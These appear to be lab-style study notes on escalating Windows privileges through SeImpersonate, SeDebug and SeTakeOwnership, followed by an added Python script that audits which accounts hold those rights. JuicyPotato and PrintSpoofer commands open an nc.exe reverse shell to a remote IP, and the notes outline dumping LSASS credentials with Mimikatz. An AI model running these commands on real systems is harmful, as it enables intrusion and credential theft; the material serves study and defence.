Windows User Privileges

SeImpersonate Privilege

Attackers often abuse this privilege in "Potato-style" privilege escalations, where a service account holds SeImpersonatePrivilege but does not otherwise have full SYSTEM-level privileges.

JuicyPotato Method

https://github.com/ohpe/juicy-potato

c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *

PrintSpoofer Method

JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards. However, PrintSpoofer and RoguePotato can be used to leverage the same privileges and gain NT AUTHORITY\SYSTEM level access. https://github.com/itm4n/PrintSpoofer

c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"

SeDebugPrivilege

To run a particular application or service, or to assist with troubleshooting, a user might be assigned SeDebugPrivilege instead of being added to the Administrators group.

We can use ProcDump from the SysInternals suite to leverage this privilege and dump process memory.

Dump Lsass

1 Dump lsass Process

2 Parse the lsass Dump with Mimikatz

RCE

https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1

1 List Processes

2 Use PoC Script

SeTakeOwnershipPrivilege

SeTakeOwnershipPrivilege grants a user the ability to take ownership of any "securable object," meaning Active Directory objects, NTFS files/folders, printers, registry keys, services, and processes.

https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1

1 Enable Privilege

2 Check File Ownership

3 Take Ownership of File

4 Confirm Ownership

5 Modify ACL on File
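As a defender's check added here (not part of the original notes or of the linked tools), the following Python audits which principals hold the three rights discussed on this page, SeImpersonatePrivilege, SeDebugPrivilege and SeTakeOwnershipPrivilege, by parsing the [Privilege Rights] section of a `secedit /export` security template and flagging any holder outside an expected baseline. The baseline SIDs are an assumed default (Administrators, LOCAL SERVICE, NETWORK SERVICE, SERVICE for SeImpersonate; Administrators for the other two) and the sample template is constructed.

```python
"""Audit which principals hold the high-risk user rights covered on this page.

Parses the [Privilege Rights] section of a security template as written by
`secedit /export /cfg <file>` and reports holders that are not in the baseline.
The sample template below is constructed, not taken from a real host.
"""

# Assumed baseline: well-known SIDs that hold these rights on a default
# workstation or member server (Administrators, LOCAL SERVICE, NETWORK SERVICE, SERVICE).
BASELINE = {
    "SeImpersonatePrivilege": {"S-1-5-32-544", "S-1-5-19", "S-1-5-20", "S-1-5-6"},
    "SeDebugPrivilege": {"S-1-5-32-544"},
    "SeTakeOwnershipPrivilege": {"S-1-5-32-544"},
}


def parse_privilege_rights(template: str) -> dict:
    """Return {privilege: set(SIDs)} from the [Privilege Rights] section."""
    rights, in_section = {}, False
    for raw in template.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_section = line == "[Privilege Rights]"
            continue
        if not in_section or "=" not in line:
            continue
        name, _, holders = line.partition("=")
        # secedit prefixes each SID with '*'; strip it so SIDs compare cleanly
        rights[name.strip()] = {h.strip().lstrip("*") for h in holders.split(",") if h.strip()}
    return rights


def audit(template: str, baseline: dict = BASELINE) -> dict:
    """Return {privilege: sorted holders not in the baseline} for the watched rights."""
    rights = parse_privilege_rights(template)
    findings = {}
    for priv, expected in baseline.items():
        extra = rights.get(priv, set()) - expected
        if extra:
            findings[priv] = sorted(extra)
    return findings


# Constructed sample: a domain service account SID has been granted SeImpersonate and SeDebug.
SAMPLE_TEMPLATE = """[Unicode]
Unicode=yes
[Privilege Rights]
SeImpersonatePrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6,*S-1-5-21-1111-2222-3333-1105
SeDebugPrivilege = *S-1-5-32-544,*S-1-5-21-1111-2222-3333-1105
SeTakeOwnershipPrivilege = *S-1-5-32-544
[Version]
signature="$CHICAGO$"
"""

if __name__ == "__main__":
    for priv, holders in audit(SAMPLE_TEMPLATE).items():
        print(f"{priv}: unexpected holders {holders}")
```

On a real host, export the template with `secedit /export /cfg rights.inf` and read the file with `encoding="utf-16"` before passing it to `audit()`; any SID it reports should be resolved and justified, since each of these rights is sufficient for the escalation paths described above.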

Interesting Files to Read
